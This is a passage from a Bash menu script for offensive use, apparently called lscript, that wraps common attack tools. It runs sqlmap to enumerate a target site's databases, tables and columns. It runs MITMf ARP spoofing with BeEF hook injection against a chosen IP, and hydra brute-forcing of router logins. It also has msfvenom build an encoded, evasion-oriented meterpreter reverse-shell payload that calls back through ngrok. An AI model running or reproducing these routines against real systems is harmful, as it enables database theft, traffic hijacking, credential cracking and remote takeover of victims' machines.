  6553. then
  6554. echo -e ""$RS"Nothing selected"$CE""
  6555. ssc=0
  6556. sleep 2
  6557. else
  6558. ssc=1
  6559. fi
  6560. break
  6561. elif [[ "$COCH" = "d" ]]
  6562. then
  6563. v1=1
  6564. while [[ "$v1" -le "$NCO" ]]
  6565. do
  6566. selc[$v1]=""
  6567. v1=$((v1+1))
  6568. done
  6569. elif [[ "$COCH" -le 0 || "$COCH" -gt "$NCO" ]]
  6570. then
  6571. echo -e ""$RS"Wrong choice"$CE""
  6572. sleep 2
  6573. continue
  6574. else
  6575. if [[ "${selc[$COCH]}" != 1 ]]
  6576. then
  6577. selc[$COCH]=1
  6578. else
  6579. selc[$COCH]=""
  6580. fi
  6581. fi
  6582. done
  6583. elif [[ "$SQ" = 6 ]]
  6584. then
  6585. while true
  6586. do
  6587. if [[ "$sts" = 0 ]]
  6588. then
  6589. echo -e ""$RS"Table not selected"$CE""
  6590. sleep 2
  6591. break
  6592. fi
  6593. sqlmap -u "$URL" -D "$SD" -T "$ST" --columns <<< $'\n\n\n\n\n\n\n\n\n\n' | tee $file3
  6594. ##finding columns
  6595. CO=$(cat "$file3" | awk '{if(/+----/)print NR}')
  6596. CO1=$(echo $CO | cut -d ' ' -f2)
  6597. CO1=$((CO1+1))
  6598. CO2=$(echo $CO | cut -d ' ' -f3)
  6599. CO2=$((CO2-1))
  6600. NCO=$((CO2-CO1))
  6601. if [[ "$NCO" -le 0 ]]
  6602. then
  6603. echo -e ""$RS"Error 24. No columns found automatically"$CE""
  6604. sleep 2
  6605. cls=0
  6606. continue
  6607. else
  6608. if [[ "$NCO" = 1 ]]
  6609. then
  6610. echo -e ""$YS"1 column found!"$CE""
  6611. sleep 2
  6612. else
  6613. echo -e ""$YS""$NCO" columns found!"$CE""
  6614. sleep 2
  6615. fi
  6616. CL="Done"
  6617. cls=1
  6618. break
  6619. fi
  6620. done
  6621. elif [[ "$SQ" = 5 ]]
  6622. then
  6623. while true
  6624. do
  6625. if [[ "$tbs" = 0 ]]
  6626. then
  6627. echo -e ""$RS"Tables not fetched"$CE""
  6628. sleep 2
  6629. break
  6630. fi
  6631. echo -e ""$BS"Tables: "$CE""
  6632. n9=1
  6633. CC1="$C1"
  6634. while [[ "$n9" -le "$NTB" ]]
  6635. do
  6636. tb[$n9]=$(cat "$file2" | awk -v n11="$CC1" '{if(NR==n11)print}' | cut -d ' ' -f2)
  6637. if [[ "$n9" -le 9 ]]
  6638. then
  6639. echo -e ""$YS" $n9"$CE") ${tb[$n9]}"
  6640. elif [[ "$n9" -le 99 ]]
  6641. then
  6642. echo -e ""$YS" $n9"$CE") ${tb[$n9]}"
  6643. else
  6644. echo -e ""$YS"$n9"$CE") ${tb[$n9]}"
  6645. fi
  6646. CC1=$((CC1+1))
  6647. n9=$((n9+1))
  6648. done
  6649. echo -e ""$YS" b"$CE") Go back"
  6650. echo -e "Choose: "
  6651. read TCH
  6652. if [[ "$TCH" = "b" || "$TCH" = "back" ]]
  6653. then
  6654. break
  6655. elif [[ "$TCH" -le 0 || "$TCH" -gt "$NTB" ]]
  6656. then
  6657. echo -e ""$RS"Wrong choice"$CE""
  6658. sleep 2
  6659. continue
  6660. else
  6661. ST="${tb[$TCH]}"
  6662. sts=1
  6663. ##Clearing nexts
  6664. cls=0
  6665. CL=""
  6666. scs=0
  6667. SC=""
  6668. break
  6669. fi
  6670. done
  6671. elif [[ "$SQ" = 4 ]]
  6672. then
  6673. if [[ "$sds" = 0 ]]
  6674. then
  6675. echo -e ""$RS"Databases not selected"$CE""
  6676. sleep 2
  6677. continue
  6678. fi
  6679. sqlmap -u "$URL" -D "$SD" --tables <<< $'\n\n\n\n\n\n\n\n\n\n' | tee "$file2"
  6680. ##finding tables
  6681. C=$(cat "$file2" | awk '{if(/+----/)print NR}')
  6682. C1=$(echo $C | cut -d ' ' -f1)
  6683. C1=$((C1+1))
  6684. C2=$(echo $C | cut -d ' ' -f2)
  6685. C2=$((C2-1))
  6686. NTB=$((C2-C1))
  6687. if [[ "$NTB" -le 0 ]]
  6688. then
  6689. echo -e ""$RS"Error 23. No tables found automatically"$CE""
  6690. sleep 2
  6691. tbs=0
  6692. continue
  6693. else
  6694. if [[ "$NTB" = 1 ]]
  6695. then
  6696. echo -e ""$YS"1 table found!"$CE""
  6697. sleep 2
  6698. else
  6699. echo -e ""$YS""$NTB" tables found!"$CE""
  6700. sleep 2
  6701. fi
  6702. TB="Done"
  6703. tbs=1
  6704. ##Clearing nexts
  6705. ST=""
  6706. sts=0
  6707. cls=0
  6708. CL=""
  6709. scs=0
  6710. SC=""
  6711. fi
  6712. elif [[ "$SQ" = 3 ]]
  6713. then
  6714. while true
  6715. do
  6716. if [[ "$fdbss" = 0 ]]
  6717. then
  6718. echo -e ""$RS"Databases not fetched"$CE""
  6719. sleep 2
  6720. continue
  6721. fi
  6722. echo -e ""$BS"Databases: "$CE""
  6723. n8=1
  6724. while [[ "$n8" -le "$NDB" ]]
  6725. do
  6726. if [[ "$n8" -le 9 ]]
  6727. then
  6728. echo -e ""$YS" "$n8""$CE") ${db[$n8]}"
  6729. elif [[ "$n8" -le 99 ]]
  6730. then
  6731. echo -e ""$YS" "$n8""$CE") ${db[$n8]}"
  6732. else
  6733. echo -e ""$YS""$n8""$CE") ${db[$n8]}"
  6734. fi
  6735. n8=$((n8+1))
  6736. done
  6737. echo -e ""$YS" b"$CE") Go back"
  6738. echo -e "Choose: "
  6739. read DCH
  6740. clear
  6741. if [[ "$DCH" = "b" || "$DCH" = "back" ]]
  6742. then
  6743. break
  6744. fi
  6745. if [[ "$DCH" -lt 0 || "$DCH" -gt "$NDB" ]]
  6746. then
  6747. echo -e ""$RS"Wrong choice"$CE""
  6748. sleep 2
  6749. else
  6750. SD="${db[$DCH]}"
  6751. sds=1
  6752. ##Clearing nexts
  6753. TB=""
  6754. tbs=0
  6755. ST=""
  6756. sts=0
  6757. cls=0
  6758. CL=""
  6759. scs=0
  6760. SC=""
  6761. break
  6762. fi
  6763. done
  6764. elif [[ "$SQ" = 2 ]]
  6765. then
  6766. if [[ "$urls" != 1 ]]
  6767. then
  6768. echo -e ""$RS"URL not selected"$CE""
  6769. sleep 2
  6770. continue
  6771. fi
  6772. file="/root/lscript/sqltemp"
  6773. sqlmap -u "$URL" --dbs <<< $'\n\n\n\n\n\n\n\n\n\n' | tee "$file"
  6774. ##Find the line
  6775. CHECK=$(cat "$file" | grep "available databases ")
  6776. if [[ "$CHECK" = "" ]]
  6777. then
  6778. fdbss=0
  6779. echo -e ""$RS"No databases found or not vulnerable website"$CE""
  6780. fdbss=0
  6781. echo -e "$PAKTGB"
  6782. $READAK
  6783. continue
  6784. fi
  6785. LINED=$(cat "$file" | awk '{if(/available databases /)print NR}')
  6786. LINED=$((LINED+1))
  6787. ##list databases
  6788. n=0
  6789. echo -e ""BS"Calculating..."$CE""
  6790. while true
  6791. do
  6792. CH=$(cat "$file" | awk -v n7="$LINED" '{if(NR==n7)print}')
  6793. if [[ "$CH" = "" ]]
  6794. then
  6795. break
  6796. else
  6797. ##how many dbs found
  6798. n=$((n+1))
  6799. ##next line
  6800. LINED=$((LINED+1))
  6801. fi
  6802. CHH=$(echo "$CH" | awk -F "] " {'print $2'})
  6803. if [[ "$CHH" = "" ]]
  6804. then
  6805. echo -e ""$RS"Error 21"$CE""
  6806. CHH=""$RS"Error"$CE""
  6807. sleep 3
  6808. fi
  6809. db[$n]="$CHH"
  6810. done
  6811. sleep 1
  6812. if [[ "$n" = 0 ]]
  6813. then
  6814. echo -e ""$RS"Error 22 No databases found automatically"$CE""
  6815. echo -e "$PAKTGB"
  6816. $READAK
  6817. continue
  6818. elif [[ "$n" = 1 ]]
  6819. then
  6820. echo -e ""$YS"1 database found!"$CE""
  6821. sleep 1
  6822. else
  6823. echo -e ""$YS"$n databases found!"$CE""
  6824. sleep 1
  6825. fi
  6826. echo -e ""
  6827. FDBS=""$YS"Done"$CE""
  6828. fdbss=1
  6829. NDB="$n"
  6830. ##Clearing nexts
  6831. SD=""
  6832. sds=0
  6833. TB=""
  6834. tbs=0
  6835. ST=""
  6836. sts=0
  6837. cls=0
  6838. CL=""
  6839. scs=0
  6840. SC=""
  6841. fi
  6842. done
  6843. }
  6844. function mitmf_hook
  6845. {
  6846. TERMINALTITLE="MITMF + BEEF"
  6847. dash_calc
  6848. printf '\033]2;MITMF + BEEF\a'
  6849. if [[ -d /root/MITMf ]]
  6850. then
  6851. TEST=$(ifconfig | grep "$ETH")
  6852. n=1
  6853. echo -e ""$BS"Available interfaces"$CE": "
  6854. if [[ "$TEST" != "" ]]
  6855. then
  6856. echo -e ""$YS"$n"$CE") "$ETH""
  6857. in[$n]="$ETH"
  6858. n=$((n+1))
  6859. fi
  6860. TEST=$(ifconfig | grep "$WLANN")
  6861. if [[ "$TEST" != "" ]]
  6862. then
  6863. echo -e ""$YS"$n"$CE") $WLANN"
  6864. in[$n]="$WLANN"
  6865. n=$((n+1))
  6866. fi
  6867. TEST=$(ifconfig | grep "$WLANNM")
  6868. if [[ "$TEST" != "" ]]
  6869. then
  6870. echo -e ""$YS"$n"$CE") $WLANNM"
  6871. in[$n]="$WLANNM"
  6872. n=$((n+1))
  6873. fi
  6874. echo -e "Choose: "
  6875. read ints
  6876. if [[ "$ints" -le "$n" && "$ints" -ge 1 ]]
  6877. then
  6878. #~ echo -e "You selected "$YS"${in[$ints]}"$CE"" #debugging
  6879. mitmfint="${in[$ints]}"
  6880. export mitmfint
  6881. clear
  6882. mitmfgate=$(route -n | grep "$mitmfint" | awk '{if($2!="0.0.0.0"){print $2}}')
  6883. export mitmfgate
  6884. clear
  6885. echo -e "Target's IP: "
  6886. read mitmftar
  6887. TEST=$(ifconfig | grep $mitmfint)
  6888. if [[ $TEST != "" ]]
  6889. then
  6890. iffile=""$LPATH"/iftemp.txt"
  6891. ifconfig $mitmfint > $iffile
  6892. mitmflocalip=$(cat $iffile | grep " inet " | awk -F "inet " {'print $2'} | cut -d ' ' -f1)
  6893. fi
  6894. clear
  6895. echo -e "hook.js URL path("$YS"Enter"$CE"=http://"$mitmflocalip":3000/hook.js): "
  6896. read hookch
  6897. if [[ "$hookch" = "" ]]
  6898. then
  6899. mitmfhook="http://"$mitmflocalip":3000/hook.js"
  6900. else
  6901. mitmfhook="$hookch"
  6902. fi
  6903. export mitmfhook
  6904. cd /root/MITMf
  6905. clear
  6906. python mitmf.py -i "$mitmfint" --spoof --arp --gateway "$mitmfgate" --target "$mitmftar" --hsts --inject --js-url "$mitmfhook"
  6907. cd
  6908. fi
  6909. else
  6910. echo -e ""$RS"Mitmf is not installed.type '"$CE""$YS"install"$CE""$RS"' to install it."
  6911. read INSTALL
  6912. if [[ "$INSTALL" = "install" ]]
  6913. then
  6914. echo -e ""$RS"No installation added yet"$CE""
  6915. sleep 2
  6916. fi
  6917. fi
  6918. cd
  6919. }
  6920. function bruteforce_router
  6921. {
  6922. while true
  6923. do
  6924. clear
  6925. TERMINALTITLE="BRUTEFORCE LOGIN"
  6926. dash_calc
  6927. TERMINALTITLE="ONLY FOR LEGAL PURPOSES"
  6928. dash_calc
  6929. printf '\033]2;BRUTEFORCE LOGIN\a'
  6930. if [[ "$BI" = "" ]]
  6931. then
  6932. TT=$(ifconfig | grep "$WLANN")
  6933. if [[ "$TT" = "" ]]
  6934. then
  6935. bin=0
  6936. BI=""$RS"None"$CE""
  6937. else
  6938. bin=1
  6939. BI="$WLANN"
  6940. fi
  6941. fi
  6942. if [[ "$US" = "" ]]
  6943. then
  6944. US="admin"
  6945. fi
  6946. if [[ "$WL" = "" ]]
  6947. then
  6948. wls=0
  6949. WL=""$RS"None"$CE""
  6950. fi
  6951. if [[ "$RQ" = "" ]]
  6952. then
  6953. rqq=0
  6954. RQ=""$RS"None"$CE""
  6955. fi
  6956. if [[ "$UP" = "" ]]
  6957. then
  6958. upp=0
  6959. UP=""$RS"None"$CE""
  6960. fi
  6961. if [[ "$IS" = "" ]]
  6962. then
  6963. iss=0
  6964. IS=""$RS"None"$CE""
  6965. fi
  6966. if [[ "$FM" = "" ]]
  6967. then
  6968. FM="http-post-form"
  6969. fi
  6970. #~ echo -e ""$RS"ONLY FOR LEGAL PURPOSES"$CE""
  6971. echo -e ""$YS" 1"$CE") Select interface Current:"$YS""$BI""$CE""
  6972. echo -e ""$YS" 2"$CE") Set username Current:"$YS""$US""$CE""
  6973. echo -e ""$YS" 3"$CE") Select wordlist Current:"$YS""$WL""$CE""
  6974. echo -e ""$YS" 4"$CE") Request URI: Current:"$YS""$RQ""$CE""
  6975. echo -e ""$YS" 5"$CE") ^USER^ & ^PASS^ field Current:"$YS""$UP""$CE""
  6976. echo -e ""$YS" 6"$CE") Invalid pass string Current:"$YS""$IS""$CE""
  6977. echo -e ""$YS" 7"$CE") Form Current:"$YS""$FM""$CE""
  6978. echo -e ""$YS" 8"$CE") Open router's login page in browser"
  6979. echo -e ""$YS" w"$CE") Open Wireshark"
  6980. echo -e ""$YS" s"$CE") Start bruteforcing"
  6981. echo -e ""$YS"bu"$CE") Burpsuite automated tool"
  6982. echo -e ""$YS" i"$CE") Info"
  6983. echo -e ""$YS" b"$CE") Go back"
  6984. echo -n "Choose: "
  6985. read BR
  6986. clear
  6987. if [[ "$BR" = "b" || "$BR" = 00 || "$BR" = "back" ]]
  6988. then
  6989. BACKL=1
  6990. break
  6991. elif [[ "$BR" = "bu" ]]
  6992. then
  6993. burpsuite
  6994. elif [[ "$BR" = "w" ]]
  6995. then
  6996. wireshark & disown
  6997. elif [[ "$BR" = 0 ]]
  6998. then
  6999. exit
  7000. elif [[ "$BR" = "i" ]]
  7001. then
  7002. echo -e ""$LGYS"With hydra you can bruteforce your router's login screen."
  7003. echo -e "Select interface"
  7004. echo -e " You need to select an interface so the script can get the gateway."
  7005. echo -e "Set username"
  7006. echo -e " Set the username for the login screen.(e.g. admin)"
  7007. echo -e "Select wordlist"
  7008. echo -e " Select a text file with a password on every line."
  7009. echo -e "Request URI"
  7010. echo -e " You will find this on Wireshark. Follow the video below for instructions."
  7011. echo -e " (e.g. /login.php) or (e.g. /cgi-bin/login.exe) etc etc..."
  7012. echo -e "^USER^ & ^PASS^ field"
  7013. echo -e " You will find this on Wireshark. Follow the video below for instructions."
  7014. echo -e " (e.g. username=^USER^&password=^PASS^)"
  7015. echo -e "Invalid pass string"
  7016. echo -e " You will find this when you try to login with the wrong pass on the login page."
  7017. echo -e " You need to set a word that is being printed on the screen when login fails."
  7018. echo -e " (e.g. Invalid) or (e.g. Wrong) or (e.g. Please) etc etc..."
  7019. echo -e " Follow the video below for instructions."
  7020. echo -e "Form"
  7021. echo -e " (e.g. http-get-form) or (e.g. http-post-form) etc etc..."
  7022. echo -e ""
  7023. echo -e "Video-demonstration: https://www.youtube.com/watch?v=vgbP0AQ5bt4"
  7024. echo -e ""
  7025. echo -e ""$CE""
  7026. echo -e "$PAKTGB"
  7027. $READAK
  7028. elif [[ "$BR" = 1 ]]
  7029. then
  7030. select_interface
  7031. if [[ "$OUTPUT" != "" && "$OUTPUT" != 0 ]]
  7032. then
  7033. bin=1
  7034. BI="$OUTPUT"
  7035. else
  7036. bin=0
  7037. fi
  7038. elif [[ "$BR" = 2 ]]
  7039. then
  7040. echo -n "Username: "
  7041. read US
  7042. elif [[ "$BR" = 3 ]]
  7043. then
  7044. echo -n "Wordlist: "
  7045. read WL
  7046. if [[ ! -f "$WL" ]]
  7047. then
  7048. WL=""
  7049. echo -e ""$RS"Couldn't find the wordlist"$CE""
  7050. wls=0
  7051. sleep 2
  7052. else
  7053. wls=1
  7054. fi
  7055. elif [[ "$BR" = 4 ]]
  7056. then
  7057. echo -n "Request URI: "
  7058. read RQ
  7059. rqq=1
  7060. elif [[ "$BR" = 5 ]]
  7061. then
  7062. echo -n "^USER^ & ^PASS^ field: "
  7063. read UP
  7064. upp=1
  7065. elif [[ "$BR" = 6 ]]
  7066. then
  7067. echo -n "Invalid pass string: "
  7068. read IS
  7069. iss=1
  7070. elif [[ "$BR" = 7 ]]
  7071. then
  7072. echo -n "Form: "
  7073. read FM
  7074. elif [[ "$BR" = 8 ]]
  7075. then
  7076. if [[ "$bin" != 1 ]]
  7077. then
  7078. echo -e ""$RS"Please select an interface first"$CE""
  7079. sleep 3
  7080. continue
  7081. fi
  7082. TT=$(ifconfig | grep "$BI")
  7083. if [[ "$TT" = "" ]]
  7084. then
  7085. echo -e ""$RS""$BI" is not available"$CE""
  7086. sleep 2
  7087. BI=""
  7088. continue
  7089. fi
  7090. echo -e ""$BS"Searching gateway on "$BI""$CE"..."
  7091. sleep 0.5
  7092. GATE=$(find_gateways "$BI" interface)
  7093. TTT=$(is_it_an_ip "$GATE")
  7094. if [[ "$TTT" != 1 ]]
  7095. then
  7096. echo -e ""$RS"Couldn't find your gateway."$CE""
  7097. sleep 2
  7098. echo -e ""$RS"Make sure you are connected to a network"$CE""
  7099. sleep 3
  7100. continue
  7101. else
  7102. echo -e ""$YS"Gateway found: "$GATE""$CE""
  7103. sleep 1
  7104. fi
  7105. clear
  7106. gio open "http://"$GATE""
  7107. echo -e "Your browser is going to open"
  7108. sleep 2
  7109. elif [[ "$BR" = "s" ]]
  7110. then
  7111. if [[ "$bin" != 1 ]]
  7112. then
  7113. echo -e ""$RS"Please select an interface first"$CE""
  7114. sleep 3
  7115. continue
  7116. fi
  7117. if [[ "$wls" != 1 ]]
  7118. then
  7119. echo -e ""$RS"Set a wordlist first"$CE""
  7120. sleep 2
  7121. continue
  7122. fi
  7123. TT=$(ifconfig | grep "$BI")
  7124. if [[ "$TT" = "" ]]
  7125. then
  7126. echo -e ""$RS""$BI" is not available"$CE""
  7127. sleep 2
  7128. BI=""
  7129. continue
  7130. fi
  7131. if [[ "$rqq" != 1 ]]
  7132. then
  7133. echo -e ""$RS"Please set the Request URI"$CE""
  7134. sleep 2
  7135. continue
  7136. fi
  7137. if [[ "$iss" != 1 ]]
  7138. then
  7139. echo -e ""$RS"Please set the invalid pass string"$CE""
  7140. sleep 2
  7141. continue
  7142. fi
  7143. if [[ "$upp" != 1 ]]
  7144. then
  7145. echo -e ""$RS"Please set the ^USER^ & ^PASS^ field"$CE""
  7146. sleep 2
  7147. continue
  7148. fi
  7149. if [[ "$FM" = "" ]]
  7150. then
  7151. echo -e ""$RS"Set the Form first"$CE""
  7152. sleep 2
  7153. continue
  7154. fi
  7155. echo -e ""$BS"Searching gateway on "$BI""$CE"..."
  7156. sleep 1
  7157. GATE=$(find_gateways "$BI" interface)
  7158. TTT=$(is_it_an_ip "$GATE")
  7159. if [[ "$TTT" != 1 ]]
  7160. then
  7161. echo -e ""$RS"Couldn't find your gateway."$CE""
  7162. sleep 2
  7163. echo -e ""$RS"Make sure you are connected to a network"$CE""
  7164. sleep 3
  7165. continue
  7166. else
  7167. echo -e ""$YS"Gateway found: "$GATE""$CE""
  7168. sleep 2
  7169. fi
  7170. clear
  7171. echo -e ""$RS"Do you have permission to bruteforce this network?"$CE""$YNONLY""
  7172. read PERM
  7173. if [[ "$PERM" != "y" && "$PERM" != "Y" ]]
  7174. then
  7175. echo -e ""$RS"You cannot proceed then"$CE""
  7176. sleep 3
  7177. continue
  7178. fi
  7179. hydra -l "$US" -P "$WL" -e nsr -f -V "$GATE" "$FM" ""$RQ":"$UP":"$IS""
  7180. echo -e "$PAKTGB"
  7181. $READAK
  7182. fi
  7183. done
  7184. }
  7185. function find_gateways()
  7186. {
  7187. #example: find_gateways wlan0 interface
  7188. FG1="$1"
  7189. FG2="$2"
  7190. if [[ "$FG1" = "" ]]
  7191. then
  7192. echo -e ""$BS"Gateways"$CE": "
  7193. n=0
  7194. ethr=$(ifconfig | grep "$ETH")
  7195. if [[ "$ethr" != "" ]]
  7196. then
  7197. ethd=$(route -n | awk -v int1="$ETH" '{if(int1~$8 && $2!="IP" && $2!="0.0.0.0"){print $2}}')
  7198. chi=$(is_it_an_ip "$ethd")
  7199. if [[ "$ethd" != "" && "$chi" = 1 ]]
  7200. then
  7201. echo -e ""$ETH" = "$YS""$ethd""$CE""
  7202. n=1
  7203. fi
  7204. fi
  7205. wlanr=$(ifconfig | grep "$WLANN")
  7206. if [[ "$wlanr" != "" ]]
  7207. then
  7208. wland=$(route -n | awk -v int1="$WLANN" '{if(int1~$8 && $2!="IP" && $2!="0.0.0.0"){print $2}}')
  7209. chi=$(is_it_an_ip "$wland")
  7210. if [[ "$wland" != "" && "$chi" = 1 ]]
  7211. then
  7212. echo -e ""$WLANN" = "$YS""$wland""$CE""
  7213. n=1
  7214. fi
  7215. fi
  7216. wlanmr=$(ifconfig | grep "$WLANNM")
  7217. if [[ "$wlanmr" != "" ]]
  7218. then
  7219. wlanmd=$(route -n | awk -v int1="$WLANNM" '{if(int1~$8 && $2!="IP" && $2!="0.0.0.0"){print $2}}')
  7220. chi=$(is_it_an_ip "$wlanmd")
  7221. if [[ "$wlanmd" != "" && "$chi" = 1 ]]
  7222. then
  7223. echo -e ""$WLANNM" = "$YS""$wlanmd""$CE""
  7224. n=1
  7225. fi
  7226. fi
  7227. if [[ "$n" = 0 ]]
  7228. then
  7229. echo -e ""$RS"No known interfaces found available"$CE""
  7230. fi
  7231. else
  7232. if [[ "$FG2" = "interface" ]]
  7233. then
  7234. inttos=$(ifconfig | grep "$FG1")
  7235. if [[ "$inttos" != "" ]]
  7236. then
  7237. gate=$(route -n | awk -v int1="$FG1" '{if(int1~$8 && $2!="IP" && $2!="0.0.0.0"){print $2}}')
  7238. cho=$(is_it_an_ip "$gate")
  7239. if [[ "$cho" = 1 ]]
  7240. then
  7241. echo "$gate"
  7242. fi
  7243. else
  7244. echo 0
  7245. fi
  7246. #~ elif [[ "$FG2" = "ip" ]]
  7247. #~ then
  7248. #~ iptos=$(ifconfig | grep "$FG1")
  7249. #~ if [[ "$iptos" != "" ]]
  7250. #~ then
  7251. #~ dot=$(give_ip_take_zero "$FG1" "dot")
  7252. #~ gate=$(route -n | awk -v int1="$dot" '{if(int1~$8 && $2!="IP" && $2!="0.0.0.0"){print $2}}')
  7253. #~ echo "$gate"
  7254. #~ cho=$(is_it_an_ip "$gate")
  7255. #~ if [[ "$cho" = 1 ]]
  7256. #~ then
  7257. #~ echo "$gate"
  7258. #~ fi
  7259. #~ else
  7260. #~ echo 0
  7261. #~ fi
  7262. #~ else
  7263. #~ echo -e ""$RS"Could not identify 2nd parameter"$CE""
  7264. #~ sleep 4
  7265. fi
  7266. fi
  7267. }
  7268. function select_interface
  7269. {
  7270. while true
  7271. do
  7272. clear
  7273. TERMINALTITLE="Select interface"
  7274. dash_calc
  7275. printf '\033]2;SELECT INTERFACE\a'
  7276. TT=$(ifconfig | grep "$WLANN:")
  7277. if [[ "$TT" != "" ]]
  7278. then
  7279. echo -e ""$YS" 1"$CE") "$WLANN""
  7280. else
  7281. echo -e ""$RS" 1"$CE") "$RS""$WLANN""$CE""
  7282. fi
  7283. TT=$(ifconfig | grep "$ETH:")
  7284. if [[ "$TT" != "" ]]
  7285. then
  7286. echo -e ""$YS" 2"$CE") "$ETH""
  7287. else
  7288. echo -e ""$RS" 2"$CE") "$RS""$ETH""$CE""
  7289. fi
  7290. echo -e ""$YS" 3"$CE") Manually type an interface"
  7291. echo -e ""$YS" b"$CE") Go back"
  7292. echo -e "Choose: "
  7293. read CI
  7294. if [[ "$CI" = 1 ]]
  7295. then
  7296. TT=$(ifconfig | grep "$WLANN:")
  7297. if [[ "$TT" != "" ]]
  7298. then
  7299. SINT="$WLANN"
  7300. OUTPUT="$SINT"
  7301. inter=0
  7302. break
  7303. else
  7304. inter=1
  7305. OUTPUT=0
  7306. echo -e ""$RS"Could not find this interface"$CE""
  7307. sleep 2
  7308. continue
  7309. fi
  7310. elif [[ "$CI" = 2 ]]
  7311. then
  7312. TT=$(ifconfig | grep "$ETH:")
  7313. if [[ "$TT" != "" ]]
  7314. then
  7315. SINT="$ETH"
  7316. OUTPUT="$SINT"
  7317. inter=0
  7318. break
  7319. else
  7320. inter=1
  7321. OUTPUT=0
  7322. echo -e ""$RS"Could not find this interface"$CE""
  7323. sleep 2
  7324. continue
  7325. fi
  7326. elif [[ "$CI" = 3 ]]
  7327. then
  7328. echo -e "Interface to use: "
  7329. read ITU
  7330. TT=$(ifconfig | grep "$ITU:")
  7331. if [[ "$TT" != "" ]]
  7332. then
  7333. SINT="$ITU"
  7334. OUTPUT="$SINT"
  7335. inter=0
  7336. break
  7337. else
  7338. echo -e ""$RS"Could not find this interface"$CE""
  7339. echo -e "Do you still want to use it?"$YNNO": "
  7340. read SU
  7341. if [[ "$SU" = "y" ]]
  7342. then
  7343. SINT="$ITU"
  7344. OUTPUT="$SINT"
  7345. inter=0
  7346. break
  7347. else
  7348. OUTPUT=0
  7349. continue
  7350. fi
  7351. fi
  7352. elif [[ "$CI" = "b" ]]
  7353. then
  7354. clear
  7355. break
  7356. fi
  7357. done
  7358. }
  7359. function donate_option
  7360. {
  7361. while true
  7362. do
  7363. clear
  7364. TERMINALTITLE="DONATION"
  7365. dash_calc
  7366. printf '\033]2;DONATION\a'
  7367. echo -e "If you found my script useful, you can buy me a coffee :)"
  7368. echo -e ""$LBS"Total lscript donations:"$CE" $DONATIONS"
  7369. echo -e ""$YS" 1"$CE") Open browser to donate"
  7370. echo -e ""$YS" 2"$CE") Copy donation link"
  7371. echo -e ""$YS" b"$CE") I don't care about your work! :P"
  7372. echo -e "Choose: "
  7373. read DON
  7374. if [[ "$DON" = "1" ]]
  7375. then
  7376. gio open "https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=GC9RSY4CS6KAY"
  7377. elif [[ "$DON" = "2" ]]
  7378. then
  7379. echo -e "Donation link: https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=GC9RSY4CS6KAY"
  7380. echo -e "$PAKTGB"
  7381. $READAK
  7382. elif [[ "$DON" = "back" || "$DON" = "b" || "$DON" = "00" ]]
  7383. then
  7384. BACKL=1
  7385. break
  7386. elif [[ "$DON" = "0" ]]
  7387. then
  7388. clear
  7389. exit
  7390. fi
  7391. done
  7392. }
  7393. function ngrok_option
  7394. {
  7395. while true
  7396. do
  7397. clear
  7398. if [[ -f /root/ngrok ]]
  7399. then
  7400. TERMINALTITLE="NGROK"
  7401. dash_calc
  7402. printf '\033]2;NGROK\a'
  7403. echo -e ""$YS"help"$CE") How to make it work?"
  7404. echo -e ""$YS" 1"$CE") Open a tcp port"
  7405. echo -e ""$YS" 2"$CE") Open a tls port"
  7406. echo -e ""$YS" 3"$CE") Open a http port"
  7407. echo -e ""$YS" 4"$CE") Intergrate with Shellter"
  7408. echo -e ""$YS" 5"$CE") Set your ngrok authtoken"
  7409. echo -e ""$YS" b"$CE") Go back"
  7410. echo -e "Choose: "
  7411. read NG
  7412. clear
  7413. if [[ "$NG" = "help" || "$NG" = "h" ]]
  7414. then
  7415. echo -e "With ngrok, you can port forward without router intergration."
  7416. echo -e "It is free, HOWEVER:"
  7417. echo -e "---to open a tcp port, you need to sign up (it's too easy)"
  7418. echo -e " Go to https://ngrok.com and choose "$YS"sign up"$CE"."
  7419. echo -e " When that's done, copy the given "$YS"authtoken"$CE"."
  7420. echo -e " (If you can't find it go to: https://dashboard.ngrok.com/auth )"
  7421. echo -e " Then select the 'set your authtoken' option in lscript, and paste it."
  7422. echo -e "---to make a reverse tcp payload:"
  7423. echo -e " You need to set the payload to: windows/meterpreter/reverse_tcp_dns"
  7424. echo -e "$PAKTGB"
  7425. $READAK
  7426. elif [[ "$NG" = 1 || "$NG" = 2 || "$NG" = 3 ]]
  7427. then
  7428. echo -e "Type the local port to forward: "
  7429. read PORTL
  7430. if [[ "$NG" = 1 ]]
  7431. then
  7432. PROT="tcp"
  7433. elif [[ "$NG" = 2 ]]
  7434. then
  7435. PROT="tls"
  7436. else
  7437. PROT="http"
  7438. fi
  7439. export PORTL
  7440. export PROT
  7441. xterm -geometry 85x15+9999+999999 -e bash -c './ngrok $PROT $PORTL; exec bash' & disown
  7442. elif [[ "$NG" = 4 ]]
  7443. then
  7444. while true
  7445. do
  7446. clear
  7447. echo -e ""$YS" 1"$CE") Make a raw tcp payload for Shellter"
  7448. echo -e ""$YS" 2"$CE") How to intergrate it"
  7449. echo -e ""$YS" b"$CE") Go back"
  7450. echo -e "Choose:"
  7451. read SHINT
  7452. clear
  7453. if [[ "$SHINT" = 1 ]]
  7454. then
  7455. while true
  7456. do
  7457. if [[ "$NGPORT" = "" ]]
  7458. then
  7459. NGPORT="\e[1;31mNONE\e[0m"
  7460. fi
  7461. clear
  7462. echo -e ""$YS" 1"$CE") Set the Ngrok tcp port CURRENT:"$NGPORT""
  7463. #~ echo -e ""$YS" 2"$CE") Set your local tcp port CURRENT:"$LPORT""
  7464. echo -e ""$YS" b"$CE") Go back"
  7465. echo -e ""$YS"run"$CE") Make the payload"
  7466. echo -e "Choose: "
  7467. read RP
  7468. if [[ "$RP" = 1 ]]
  7469. then
  7470. echo -e "Ngrok port: "
  7471. read NGPORT
  7472. elif [[ "$RP" = "back" || "$RP" = "b" ]]
  7473. then
  7474. break
  7475. elif [[ "$RP" = "run" ]]
  7476. then
  7477. RAW=rawfud
  7478. NUMB=1
  7479. while true
  7480. do
  7481. RAWN=""$RAW""$NUMB""
  7482. if [[ -f /root/Desktop/"$RAWN".raw ]]
  7483. then
  7484. NUMB=$((NUMB+1))
  7485. else
  7486. break
  7487. fi
  7488. done
  7489. msfvenom -p windows/meterpreter/reverse_tcp_dns LHOST=0.tcp.ngrok.io LPORT=$NGPORT -e x86/shikata_ga_nai -i 15 -f raw -o /root/Desktop/"$RAWN".raw
  7490. sleep 2
  7491. if [[ -f /root/Desktop/"$RAWN".raw ]]
  7492. then
  7493. clear
